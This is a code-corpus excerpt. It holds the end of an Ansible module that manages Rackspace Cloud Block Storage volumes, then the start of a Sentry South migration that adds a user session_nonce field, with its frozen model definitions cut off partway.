    """Create or delete a Rackspace Cloud Block Storage volume and exit the
    Ansible module with the result (never returns normally: always calls
    module.exit_json or module.fail_json).
    """
    changed = False
    volume = None
    instance = {}
    cbs = pyrax.cloud_blockstorage
    if cbs is None:
        module.fail_json(msg='Failed to instantiate client. This '
                             'typically indicates an invalid region or an '
                             'incorrectly capitalized region name.')
    if image:
        # pyrax<1.9.3 did not have support for specifying an image when
        # creating a volume which is required for bootable volumes
        if LooseVersion(pyrax.version.version) < LooseVersion('1.9.3'):
            module.fail_json(msg='Creating a bootable volume requires '
                                 'pyrax>=1.9.3')
        image = rax_find_image(module, pyrax, image)
    volume = rax_find_volume(module, pyrax, name)
    if state == 'present':
        if not volume:
            kwargs = dict()
            if image:
                kwargs['image'] = image
            try:
                volume = cbs.create(name, size=size, volume_type=volume_type,
                                    description=description,
                                    metadata=meta,
                                    snapshot_id=snapshot_id, **kwargs)
                changed = True
            except Exception as e:
                module.fail_json(msg='%s' % e.message)
            else:
                if wait:
                    # Poll every 5 seconds until built or timeout expires.
                    attempts = wait_timeout / 5
                    pyrax.utils.wait_for_build(volume, interval=5,
                                               attempts=attempts)
        volume.get()
        instance = rax_to_dict(volume)
        result = dict(changed=changed, volume=instance)
        if volume.status == 'error':
            result['msg'] = '%s failed to build' % volume.id
        elif wait and volume.status not in VOLUME_STATUS:
            result['msg'] = 'Timeout waiting on %s' % volume.id
        if 'msg' in result:
            module.fail_json(**result)
        else:
            module.exit_json(**result)
    elif state == 'absent':
        if volume:
            instance = rax_to_dict(volume)
            try:
                volume.delete()
                changed = True
            except Exception as e:
                module.fail_json(msg='%s' % e.message)
        # Deleting a volume that does not exist is a no-op (changed=False).
        module.exit_json(changed=changed, volume=instance)
def main():
    """Entry point: declare the module's argument spec, validate input and
    delegate to cloud_block_storage()."""
    argument_spec = rax_argument_spec()
    argument_spec.update(
        dict(
            description=dict(type='str'),
            image=dict(type='str'),
            meta=dict(type='dict', default={}),
            name=dict(required=True),
            size=dict(type='int', default=100),
            snapshot_id=dict(),
            state=dict(default='present', choices=['present', 'absent']),
            volume_type=dict(choices=['SSD', 'SATA'], default='SATA'),
            wait=dict(type='bool', default=False),
            wait_timeout=dict(type='int', default=300)
        )
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=rax_required_together()
    )
    if not HAS_PYRAX:
        module.fail_json(msg='pyrax is required for this module')
    description = module.params.get('description')
    image = module.params.get('image')
    meta = module.params.get('meta')
    name = module.params.get('name')
    size = module.params.get('size')
    snapshot_id = module.params.get('snapshot_id')
    state = module.params.get('state')
    volume_type = module.params.get('volume_type')
    wait = module.params.get('wait')
    wait_timeout = module.params.get('wait_timeout')
    # Authenticate against the Rackspace API using the module's credentials.
    setup_rax_module(module, pyrax)
    cloud_block_storage(module, state, name, description, meta, size,
                        snapshot_id, volume_type, wait, wait_timeout,
                        image)
# import module snippets
# Star imports are the legacy Ansible pattern: they provide AnsibleModule
# and the rax_* helper functions used above.
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
# invoke the module
if __name__ == '__main__':
    main()
| gpl-3.0 |
looker/sentry | src/sentry/south_migrations/0276_auto__add_field_user_session_nonce.py | 4 | 87423 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'User.session_nonce'
db.add_column(
'auth_user',
'session_nonce',
self.gf('django.db.models.fields.CharField')(max_length=12, null=True),
keep_default=False
)
    def backwards(self, orm):
        """Revert the migration: drop ``auth_user.session_nonce``."""
        # Deleting field 'User.session_nonce'
        db.delete_column('auth_user', 'session_nonce')
models = {
'sentry.activity': {
'Meta': {
'object_name': 'Activity'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True'
}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.apikey': {
'Meta': {
'object_name': 'ApiKey'
},
'allowed_origins':
('django.db.models.fields.TextField', [], {
'null': 'True',
'blank': 'True'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32'
}),
'label': (
'django.db.models.fields.CharField', [], {
'default': "'Default'",
'max_length': '64',
'blank': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Organization']"
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.apitoken': {
'Meta': {
'object_name': 'ApiToken'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True'
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'token':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.auditlogentry': {
'Meta': {
'object_name': 'AuditLogEntry'
},
'actor': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_actors'",
'null': 'True',
'to': "orm['sentry.User']"
}
),
'actor_key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True',
'blank': 'True'
}
),
'actor_label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'target_object':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'target_user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_targets'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.authenticator': {
'Meta': {
'unique_together': "(('user', 'type'),)",
'object_name': 'Authenticator',
'db_table': "'auth_authenticator'"
},
'config': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {}),
'created_at':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authidentity': {
'Meta': {
'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))",
'object_name': 'AuthIdentity'
},
'auth_provider': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.AuthProvider']"
}
),
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'last_synced':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_verified':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authprovider': {
'Meta': {
'object_name': 'AuthProvider'
},
'config': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_global_access':
('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'default_role':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50'
}),
'default_teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']",
'unique': 'True'
}
),
'provider': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'sync_time':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
})
},
'sentry.broadcast': {
'Meta': {
'object_name': 'Broadcast'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_expires': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime(2016, 11, 9, 0, 0)',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active':
('django.db.models.fields.BooleanField', [], {
'default': 'True',
'db_index': 'True'
}),
'link': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.CharField', [], {
'max_length': '256'
}),
'title': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'upstream_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'blank': 'True'
}
)
},
'sentry.broadcastseen': {
'Meta': {
'unique_together': "(('broadcast', 'user'),)",
'object_name': 'BroadcastSeen'
},
'broadcast': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Broadcast']"
}
),
'date_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.commit': {
'Meta': {
'unique_together': "(('repository_id', 'key'),)",
'object_name': 'Commit',
'index_together': "(('repository_id', 'date_added'),)"
},
'author': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.CommitAuthor']",
'null': 'True'
}
),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'message': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'repository_id':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {
'unique_together': "(('organization_id', 'email'),)",
'object_name': 'CommitAuthor'
},
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.counter': {
'Meta': {
'object_name': 'Counter',
'db_table': "'sentry_projectcounter'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'unique': 'True'
}
),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dsymbundle': {
'Meta': {
'object_name': 'DSymBundle'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'sdk': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymSDK']"
}
)
},
'sentry.dsymobject': {
'Meta': {
'object_name': 'DSymObject'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_path': ('django.db.models.fields.TextField', [], {
'db_index': 'True'
}),
'uuid':
('django.db.models.fields.CharField', [], {
'max_length': '36',
'db_index': 'True'
}),
'vmaddr':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'vmsize':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
})
},
'sentry.dsymsdk': {
'Meta': {
'object_name':
'DSymSDK',
'index_together':
"[('version_major', 'version_minor', 'version_patchlevel', 'version_build')]"
},
'dsym_type':
('django.db.models.fields.CharField', [], {
'max_length': '20',
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'sdk_name': ('django.db.models.fields.CharField', [], {
'max_length': '20'
}),
'version_build': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'version_major': ('django.db.models.fields.IntegerField', [], {}),
'version_minor': ('django.db.models.fields.IntegerField', [], {}),
'version_patchlevel': ('django.db.models.fields.IntegerField', [], {})
},
'sentry.dsymsymbol': {
'Meta': {
'unique_together': "[('object', 'address')]",
'object_name': 'DSymSymbol'
},
'address':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'symbol': ('django.db.models.fields.TextField', [], {})
},
'sentry.environment': {
'Meta': {
'unique_together': "(('project_id', 'name'),)",
'object_name': 'Environment'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.event': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'Event',
'db_table': "'sentry_message'",
'index_together': "(('group_id', 'datetime'),)"
},
'data':
('sentry.db.models.fields.node.NodeField', [], {
'null': 'True',
'blank': 'True'
}),
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'event_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'db_column': "'message_id'"
}
),
'group_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'time_spent':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'null': 'True'
})
},
'sentry.eventmapping': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'EventMapping'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventtag': {
'Meta': {
'unique_together':
"(('event_id', 'key_id', 'value_id'),)",
'object_name':
'EventTag',
'index_together':
"(('project_id', 'key_id', 'value_id'), ('group_id', 'key_id', 'value_id'))"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {
'unique_together':
"(('project', 'ident'), ('project', 'hash'))",
'object_name':
'EventUser',
'index_together':
"(('project', 'email'), ('project', 'username'), ('project', 'ip_address'))"
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'null': 'True'
}),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'username':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
})
},
'sentry.file': {
'Meta': {
'object_name': 'File'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'legacy_blob'",
'null': 'True',
'to': "orm['sentry.FileBlob']"
}
),
'blobs': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.FileBlob']",
'through': "orm['sentry.FileBlobIndex']",
'symmetrical': 'False'
}
),
'checksum':
('django.db.models.fields.CharField', [], {
'max_length': '40',
'null': 'True'
}),
'headers': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'type': ('django.db.models.fields.CharField', [], {
'max_length': '64'
})
},
'sentry.fileblob': {
'Meta': {
'object_name': 'FileBlob'
},
'checksum':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'path': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'size':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'timestamp': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
)
},
'sentry.fileblobindex': {
'Meta': {
'unique_together': "(('file', 'blob', 'offset'),)",
'object_name': 'FileBlobIndex'
},
'blob': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.FileBlob']"
}
),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.globaldsymfile': {
'Meta': {
'object_name': 'GlobalDSymFile'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'uuid':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '36'
})
},
'sentry.group': {
'Meta': {
'unique_together': "(('project', 'short_id'),)",
'object_name': 'Group',
'db_table': "'sentry_groupedmessage'",
'index_together': "(('project', 'first_release'),)"
},
'active_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'culprit': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'null': 'True',
'db_column': "'view'",
'blank': 'True'
}
),
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']",
'null': 'True',
'on_delete': 'models.PROTECT'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_public': (
'django.db.models.fields.NullBooleanField', [], {
'default': 'False',
'null': 'True',
'blank': 'True'
}
),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'level': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '40',
'db_index': 'True',
'blank': 'True'
}
),
'logger': (
'django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64',
'db_index': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'null': 'True'
}
),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'resolved_at':
('django.db.models.fields.DateTimeField', [], {
'null': 'True',
'db_index': 'True'
}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'short_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
),
'time_spent_count':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'time_spent_total':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'default': '0'
}),
'times_seen': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '1',
'db_index': 'True'
}
)
},
'sentry.groupassignee': {
'Meta': {
'object_name': 'GroupAssignee',
'db_table': "'sentry_groupasignee'"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'unique': 'True',
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'assignee_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_assignee_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupbookmark': {
'Meta': {
'unique_together': "(('project', 'user', 'group'),)",
'object_name': 'GroupBookmark'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'bookmark_set'",
'to': "orm['sentry.Project']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'sentry_bookmark_set'",
'to': "orm['sentry.User']"
}
)
},
'sentry.groupemailthread': {
'Meta': {
'unique_together': "(('email', 'group'), ('email', 'msgid'))",
'object_name': 'GroupEmailThread'
},
'date': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'msgid': ('django.db.models.fields.CharField', [], {
'max_length': '100'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'groupemail_set'",
'to': "orm['sentry.Project']"
}
)
},
'sentry.grouphash': {
'Meta': {
'unique_together': "(('project', 'hash'),)",
'object_name': 'GroupHash'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'hash': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
)
},
'sentry.groupmeta': {
'Meta': {
'unique_together': "(('group', 'key'),)",
'object_name': 'GroupMeta'
},
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']"
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {
'object_name': 'GroupRedirect'
},
'group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'previous_group_id':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'unique': 'True'
})
},
'sentry.grouprelease': {
'Meta': {
'unique_together': "(('group_id', 'release_id', 'environment'),)",
'object_name': 'GroupRelease'
},
'environment':
('django.db.models.fields.CharField', [], {
'default': "''",
'max_length': '64'
}),
'first_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'project_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'release_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.groupresolution': {
'Meta': {
'object_name': 'GroupResolution'
},
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'unique': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'release': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Release']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.grouprulestatus': {
'Meta': {
